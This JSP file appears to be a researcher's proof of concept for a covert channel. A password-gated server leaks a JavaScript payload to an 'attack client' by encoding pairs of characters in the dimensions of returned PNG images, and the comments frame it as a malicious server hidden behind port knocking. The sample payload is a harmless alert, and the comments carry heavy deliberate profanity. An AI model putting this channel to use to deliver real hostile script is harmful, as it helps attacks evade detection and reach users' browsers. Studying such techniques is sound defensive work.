<%

/**
 * 
 * Arshan Dabirsiaghi (arshan.dabirsiaghi@gmail.com)
 * http://i8jesus.com
 *
 * Here's the protocol. This could be done easier with a stateful session, but this is way cooler and it allows us to do transmission ordering which would be
 * an issue with the browser's concurrent image requests. This is how Chef Gordon Ramsay would do it. In his honor, I will litter the source code with swear words.
 *
 * 1) Phase I: Start the fucking transaction, client figures out payload length
 *   - piece of shit browser client makes  a request with i=arshan and no j parameter
 *   - in real world, malicious fucking server could hide their purpose with port
 *     knocking or some other passive authentication, shitface.  
 *   - server responds with image with height = length(fucking payload). as with all the messages
 *     in this protocol, the contents of the image are as irrelevant as your south beach recipes. 
 *     the real "messages" are the dimensions. the first message is just a bit extra fucking special
 *     because it only needs to send 1 dimension which is the length of the payload. 
 *     
 * 2) Phase II: Transmitting payload
 *   - the server sits back and watches
 *   - user makes a request with i=arshan (or whatever PASSWORD is set to) and j=index
 *   - server returns an img whose dimensions are the next two bytes in the payload message
 *   - client knows the payload length from stage 1
 * 
 * 3) Phase III: Client has payload, fucks something up with it
 *   - attack client now has full payload
 *
 */

%>

<%@ page language="java" %>
<%@ page import="java.io.*" %>
<%@ page import="java.awt.*"%>
<%@ page import="java.awt.image.*"%>
<%@ page import="javax.imageio.ImageIO"%>

<% 

   final String PAYLOAD  = "alert('arshanismyhero')";
   final String PASSWORD = "arshan";
%>

<%

   int width = 1;
   int height = 1;
   
   String i = request.getParameter("i");
   String j = request.getParameter("j");
   
   if ( PASSWORD.equals(i) && j == null ) {
   
   // phase 1
      height = PAYLOAD.length();
   
   } else if ( PASSWORD.equals(i) ) {
   
      // phase 2
      int index = Integer.parseInt(j);
      
      if ( index >= 0 && index < PAYLOAD.length() ) {
         // valid payload request
         width  = (int)PAYLOAD.charAt(index);
         if ( index+1 != PAYLOAD.length() ) {
            height = (int)PAYLOAD.charAt(index+1);
         }
      }
      
   }

   BufferedImage buffer = new BufferedImage(width,height,BufferedImage.TYPE_INT_RGB);

   /* make the image all black to verify during testing */
   for(int x=0;x<width;x++) {
      for(int y=0;y<height;y++) {
         buffer.setRGB(x,y,0xFFFFFFFF);
      }
   }
   
   response.setContentType("image/png");
   
   OutputStream os = response.getOutputStream();
   
   ImageIO.write(buffer, "png", os);
   
   os.close();
   
%>